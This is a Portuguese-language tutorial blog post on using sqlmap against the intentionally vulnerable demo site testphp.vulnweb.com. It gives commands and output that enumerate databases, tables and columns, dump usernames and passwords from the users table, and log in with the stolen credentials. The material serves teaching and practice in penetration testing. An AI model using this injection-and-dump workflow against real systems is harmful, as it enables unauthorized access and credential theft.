SQLMAP na Prática
0
0

SQLMAP na Prática

Marcos Henrique
0 min
0
0
Email image

O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados.

01 — Passo

Para realizar a execução do SQLMAP é necessário utilizar um parâmetro GET exemplo: www.site.com/index.php?id=1, então para isso navegue no site ate encontrar a opção como no exemplo abaixo:

http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs

-u : URL, Endereço do site.
–-dbs : Lista os banco de dados do site.

Email image

02 — Passo

Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).

Email image

03 — Passo

Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não).

Email image

04 — Passo

Como pode visualizar os banco de dados são exibidos:

[*] acuart
[*] information_schema

Email image

05 — Passo

Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart –-tables

-D : Define o banco de dados que será avaliado.
acuart : Banco de dados do site.
-–tables : Lista todas as tabelas do banco de dados informado.

Email image

06 — Passo

Como resultado são extraídas 8 tabelas do banco de dados acuart.

+ artists
+ carts
+ categ
+ featured
+ guestbook
+ pictures
+ products
+ users

Email image

07 — Passo

Vamos extrair todas as colunas existentes na tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users –-columns

-T : Define a tabela que será avaliada.
users : Tabela do banco de dados acuart.
-–columns : Lista todas as colunas da tabela users.

Email image

08 — Passo

Como resultado são extraídas 8 colunas da tabela users.

+ address
+ cart
+ cc
+ email
+ name
+ pass
+ phone
+ uname

Email image

09 — Passo

Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users -C name,pass,uname,email –-dump

-C : Define as colunas que será avaliada.
name,pass,uname,email : Lista das colunas da tabela users.
-–dump : Extrai todas as informações contidas nas colunas da tabela informada.

Email image

10 — Passo

Segue abaixo todos os dados extraídos:

pass: test
name: John Smith
uname: test
email: email@email.com

Email image

11 — Passo

Munido das informações extraídas realize o acesso ao sistema:.

Site: testphp.vulnweb.com/login.php
Username: test
Password: test

Email image

12 — Passo

Login realizado com sucesso, basta confirmar as informações.

Email image

Fonte: https://www.100security.com.br/sqlmap